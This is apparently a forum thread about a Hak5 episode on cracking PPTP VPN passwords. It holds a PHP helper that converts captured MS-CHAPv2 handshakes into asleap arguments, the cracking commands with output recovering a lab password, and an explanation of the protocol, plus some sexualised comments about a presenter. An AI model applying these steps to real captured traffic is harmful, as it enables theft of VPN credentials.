Episode 6x12, Hacking PPTP VPNs with ASLEAP Options

[Darren Kitchen]

Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

[Iain]

Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.

[Darren Kitchen]

Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.

I've uploaded one of my test packet captures to http://www.hak5.org/files/cap5.dump and the corresponding wordlist to http://www.hak5.org/files/wordlist.txt

The challenge is BEB90BD54A9D289758C9AE837944BC1B
The response is 725423423D1D0EB68B10DCB78743F97F0000000000000000

The username is "david" and the password is MurphyDade109 (If you check the wordlist you'll notice that before using Paul as a target I was going to go with characters from the movie Hackers.)

Feel free to have a go at it.

I did notice that if I told to RRAS server only to use CHAP instead of CHAPv2 I would get the expected 8 byte (16 chr) challenge, but the response would be all zeroes. Odd.

It kinda sucks that I wasn't able to produce a working demo but this happens from time to time and instead of scraping the segment all together (time constraints) I just made it work. Kinda. Anyway, hopefully someone else will have better luck and I hope to get this figured out soon.

[Iain]

My challenge for the weekend!

[Psychosis]

Pun intended?

I can't get it to work either. The challenge is too long for MS-Chap-v2, and for CHAP the response is just a bunch of zeroes.

(Why does ASLEAP compile under Backtrack 4 Pre-Final, but not under Ubuntu 9.04? Did I miss something?)

[Sc00bz]

Hmm I guess Darren doesn't read his email. Well here's what I emailed him.

CODE

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>asleap 2.2 Argument Generator</title>
<script type="text/javascript">
// <![CDATA[
// I so stole this function from phpBB
function selectCode()
{
   // Get ID of code block
   var e = document.getElementsByTagName('CODE')[0];

   // Not IE
   if (window.getSelection)
   {
      var s = window.getSelection();
      // Safari
      if (s.setBaseAndExtent)
      {
         s.setBaseAndExtent(e, 0, e, e.innerText.length - 1);
      }
      // Firefox and Opera
      else
      {
         var r = document.createRange();
         r.selectNodeContents(e);
         s.removeAllRanges();
         s.addRange(r);
      }
   }
   // Some older browsers
   else if (document.getSelection)
   {
      var s = document.getSelection();
      var r = document.createRange();
      r.selectNodeContents(e);
      s.removeAllRanges();
      s.addRange(r);
   }
   // IE
   else if (document.selection)
   {
      var r = document.body.createTextRange();
      r.moveToElementText(e);
      r.select();
   }
}
// ]]>
</script>
</head>
<body>
<div style="width:90%; margin:auto;">
<?php
if (isset($_GET['u'], $_GET['c'], $_GET['r']))
{
    $c = str_replace(':', '', $_GET['c']);
    $r = str_replace(':', '', $_GET['r']);
    $chapChallengeGood = preg_match("/^[0-9a-f]{32}$/i", $c);
    $chapResponseGood  = preg_match("/^[0-9a-f]{98}$/i", $r);
    if ($chapChallengeGood == 0)
    {
        echo 'Invalid CHAP Challenge.<br />';
    }
    if ($chapResponseGood == 0)
    {
        echo 'Invalid CHAP Response.<br />';
    }
    if ($chapChallengeGood && $chapResponseGood)
    {
        // **** This is the interesting part ****
        $userName = $_GET['u'];
        $authChallenge = pack('H*', $c);
        $peerChallenge = pack('H*', substr($r, 0, 32));
        $challenge = substr(sha1($peerChallenge . $authChallenge . $userName), 0, 16);
        $response = substr($r, 48, 48);
        $challenge = preg_replace("/([0-9a-f]{2})/i", '$1:', $challenge, 7);
        $response = preg_replace("/([0-9a-f]{2})/i", '$1:', $response, 23);
        // **** This is the interesting part ****
    }
}
?>
    <form method="get">
        User Name:<br />
        <input type="text" name="u" /><br />
        <br />
        "PPP CHAP Challenge" (16 bytes, 32 Hex characters):<br />
        <input type="text" name="c" size="45" /><br />
        <br />
        "PPP CHAP Response" (49 bytes, 98 Hex characters):<br />
        <input type="text" name="r" size="137" /><br />
        <input type="submit" value="Generate asleap arguments" />
    </form>
<?php
if (isset($challenge, $response))
{?>    <br />
    <a href="#" onclick="selectCode(); return false;">Select All</a><br />
    <div style="overflow:auto; width:100%;"><code style="white-space:pre;">./asleap -C <?php echo $challenge; ?> -R <?php echo $response; ?> -f words.dat -n words.idx</code></div>
<?php
}
?>
</div>
</body>
</html>

The PHP file will convert the CHAP challenge and response packet data into asleap arguments.

To copy the data from the packet right click on the value then "Copy" -> "Bytes (Hex Stream)" or "Copy" -> "Value" (if you have a newer version of Wireshark). "Copy" -> "Value" inserts the colons in between each byte which isn't necessary for the PHP file.

Your example in 6x12:
"CHAP Challenge": e1c0e8923252b20b5561ddf404310826
"CHAP Response": d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce12
67513fcf682b521800

"CHAP Challenge" packet is the "auth challenge" 16 byte value.
"CHAP Response" packet has the "peer challenge" 16 byte value and the peer response 24 byte value.

user name is paul
auth challenge is e1c0e8923252b20b5561ddf404310826
peer challenge is d4cfa66f00364d66fbf65f85de927930
peer response is 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
this gives you a challenge of 6a0062c675397a16
I do not know what the null characters are for, but they are probably just there for padding.

You should get this from the PHP file:
./asleap -C 6a:00:62:c6:75:39:7a:16 -R 02:5b:3b:ae:30:a5:0b:e2:5e:47:62:5c:2d:13:ce:12:67:51:3f:cf:68:2b:52:18 -f words.dat -n words.idx

When you run that with your word list it says:

CODE

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        ebcd
    Could not find a matching NT hash.  Try expanding your password list.
    I've given up.  Sorry it didn't work out.

it found the hash bytes but the password seems to not be in the word list. Also you can't create a useful rainbow table for this since you only have 2 bytes of the hash.

-------------------

For the one posted above do the same thing.
user name is david
"CHAP Challenge" is e1c0e8923252b20b5561ddf404310826
"CHAP Response" is d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce12
67513fcf682b521800

This gives you:
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

Now run:
./genkeys -r wordlist.txt -f words.dat -n words.idx
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

And you'll get:

CODE

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        31cf
    NT hash:           5635283972918a8f9fb608418d9331cf
    password:          MurphyDade109

[Psychosis]

Nice.

[BuddhaChu]

Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.

http://revision3.com/forum/showthread.php?t=31345

[Darren Kitchen]

Hmm I guess Darren doesn't read his email.

I want to read it all, honestly I do. And I will, eventually. But I have a to-do list a mile long and all I can attack these buckets of email with is a soup spoon.

Anyway, thanks. I need to wrap my head around those functions. I knew it had something to do with the encoding. I'll be sure to highlight this in a coming episode. Probably not the very next since it'll be live at Va Tech.

Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.

There was an editing mistake that caused a re-render and re-release of the show. You may have caught a bad version. Is it still messed up?

(If you caught the show early and pay attention to the bear ad you'll see what I mean)

[Wetwork]

Good episode!!!

Asleep is a good tool IF you can get it to work and you have all the info that you need to perform a successful attack and you have a dictionary large enough and tailored enough to make a successful go at it

I am just blown away that after weeks of throwing the request out........ Paul finally made it in front of the Camera and not only that we see him in his awesome party suit for the domain.com sponsor spot. That was worth the wait!!! as well as the look of pure horror on Jason's face when he opened the door to see Paul in the Pink Party Suit

Paul i am glad that they released you from your chains of bondage behind the camera i hope that this is going to be an ongoing trend and not just when Snubs and Matt abandon Darren for parts unknown. Stand up for your rights Camera guy and demand a segment of your own!!!

Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her

Its great to see Hak5 back to real hacking again, brings a warm fuzzy to my old heart!

[Psychosis]

Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her

Where did you get that from?

[Wetwork]

Where did you get that from?

Darren mentioned it when he was creating the list of Paul passwords for Asleep...Dont know if he was just "rolling" with it for the sake of the segment or if it was true...

[Psychosis]

I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed of cupp.py, and that they had a son named Paul.

[Coreyja]

Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her

I could be totally wrong on this so don't yell at me but aren't Snubs and Darren going out?

[Wetwork]

I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed of cupp.py, and that they had a son named Paul.

Snubs you sexy minx, getting around arent you

Who ever Shannon is going out with he is a lucky guy

[scrapheap]

Snubs and Paul??? Married????? Really??? say it isn't so??? If that is the case there is thousand of 16yo Hak5 Fans that are crying in there Mountain Dews and Jolt colas over there dreams of someday interfacing with her

I was going to say something about it not being on 16yo Hak5 Fans but then realised I was starting to sound like a crazy stalker/ serial killer

[Wetwork]

I was going to say something about it not being on 16yo Hak5 Fans but then realised I was starting to sound like a crazy stalker/ serial killer

Im sure that there are many Hak5 fans of all ages that are stripping there cable over Snubs, but in reality who could blame them she is a hottie

[Darren Kitchen]

Comments from Sc00bz code:

CODE

"pack('H*', $str)" converts $str from a hex string to binary data. This is the opposite of the PHP function bin2hex(). I would love to just use hex2bin() but that function doesn't exist in PHP.

--------------------------

In MS-CHAPv2 (RFC 2759) the server sends a 16 byte authenticator challenge to the client and the client generates another 16 bytes of random data called the peer challenge. Using the peer challenge, authenticator challenge, and user name the client generates the 8 byte challenge. Then using the 8 byte challenge the client generates the response and sends the peer challenge and the response.

// Short version (just the 8 byte challenge generation):
// sha1() is the same one in PHP
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
// ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
challenge = substr(sha1BinaryData, 0, 8)
// ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)


You can stop here if you just want to know how the 8 byte challenge is generated.


// Long version (full MS-CHAPv2):
response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use

string /*24 bytes*/ MS_CHAPv2(string userName, string authenticatorChallenge /*16 bytes*/, string peerChallenge /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}

// sha1() is the same one in PHP
string sha1(string str[, bool raw_output = false])
{
// If the optional raw_output is set to TRUE, then
// the sha1 digest is instead returned in raw binary
// format with a length of 20, otherwise the returned
// value is a 40-character hexadecimal number.
}

string /*24 bytes*/ ChallengeResponse(string challenge /*8 bytes*/, string hash /*16 bytes*/)
{
hashPadded = hash . "\x00\x00\x00\x00\x00" // cat 5 null characters

response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
return response
}

string /*8 bytes*/ DesEncrypt(string message /*8 bytes*/, string key /*7 bytes*/)
{
// Encrypts message using key and returns cipher text (8 bytes).
}

-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
// { inside of MS_CHAPv2()
// sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true)
// // ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
// challenge = substr(sha1BinaryData, 0, 8)
// // ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)
// response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
// // { inside of ChallengeResponse()
// // hashPadded = ntlmHash . "\x00\x00\x00\x00\x00" // cat 5 null characters
// // // 8846f7eaee8fb117ad06bdd830b7586c0000000000
// //
// // response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
// // return response
// // // bc4acb4a3953680e = DesEncrypt(ab8031f17836bd56, 8846f7eaee8fb1)
// // // ... abd6fd979ad078aa .= DesEncrypt(ab8031f17836bd56, 17ad06bdd830b7)
// // // ... 5c21b44e13ea7df2 .= DesEncrypt(ab8031f17836bd56, 586c0000000000)
// // // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// // }
// return response
// // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// }
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use
// 706565725f6368616c6c656e67652e2e0000000000000000bc4acb4a3953680eabd6fd979ad078aa

--------------------------
--------------------------

Just for completeness here is MS-CHAPv1:
In MS-CHAPv1 (RFC 2433) the server sends the 8 byte challenge to the client and the client returns lmResponse and ntlmResponse. This is the same algorithm as NTLMv1 for SMB shared folders. Rainbow tables (halflmchall, lmchall, ntlmchall) can be made to attack this algorithm by spoofing a server with a constant challenge; most commonly the challenge is 1122334455667788.

response = MS_CHAPv1(challenge, lmHash, ntlmHash)
responsePacketValue = response .
"\x0?"; // "Use Windows NT compatible challenge response" flag

string /*48 bytes*/ MS_CHAPv1(string challenge /*8 bytes*/, string lmHash /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
response = ChallengeResponse(challenge, lmHash) // 24 bytes returned
response .= ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}
/* Quoted from RFC 2433:
The "use Windows NT compatible challenge response" flag, if 1,
indicates that the Windows NT response is provided and should be used
in preference to the LAN Manager response. The LAN Manager response
will still be used if the account does not have a Windows NT password
hash, e.g. if the password has not been changed since the account
was uploaded from a LAN Manager 2.x account database. If the flag is
0, the Windows NT response is ignored and the LAN Manager response is
used. Since the use of LAN Manager authentication has been
deprecated, this flag SHOULD always be set (1) and the LAN Manager
compatible challenge response field SHOULD be zero-filled.
*/